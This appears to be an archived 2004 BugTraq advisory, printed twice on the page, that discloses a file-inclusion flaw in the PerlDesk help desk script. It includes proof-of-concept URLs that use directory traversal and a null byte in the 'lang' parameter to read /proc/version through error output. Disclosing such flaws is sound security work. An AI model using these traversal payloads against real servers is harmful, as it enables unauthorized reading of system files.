BugTraq
Back to list
|
Post reply
Posible Inclusion File in Perl Desk
Sep 12 2004 06:28PM
Nikyt0x Argentina (nikyt0x hotmail com)
Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox
[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com
[Information]
PerlDesk is a feature packed web based help desk and email management application designed
to streamline the operation of managing emails or support requests, with built in tracking
and response logging it is an ideal help desk solution for companies with one or more members
of staff or for those who want to organise client support.
[Bug]
Bug is in Inclusion in lang.
Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods /etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux /usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .) at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
But if you use: pdesk.cgi?lang=[file]%00 :
Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%0
0
syntax error at include/lang/../../../../../../../proc/version line 1, near "2.4.21 (" Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
If you read error, you can see Version of Kernel "2.4.21".
...I love this game...
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox
[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com
[Information]
PerlDesk is a feature packed web based help desk and email management application designed
to streamline the operation of managing emails or support requests, with built in tracking
and response logging it is an ideal help desk solution for companies with one or more members
of staff or for those who want to organise client support.
[Bug]
Bug is in Inclusion in lang.
Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods /etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux /usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .) at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
But if you use: pdesk.cgi?lang=[file]%00 :
Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%0
0
syntax error at include/lang/../../../../../../../proc/version line 1, near "2.4.21 (" Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
If you read error, you can see Version of Kernel "2.4.21".
...I love this game...
[ reply ]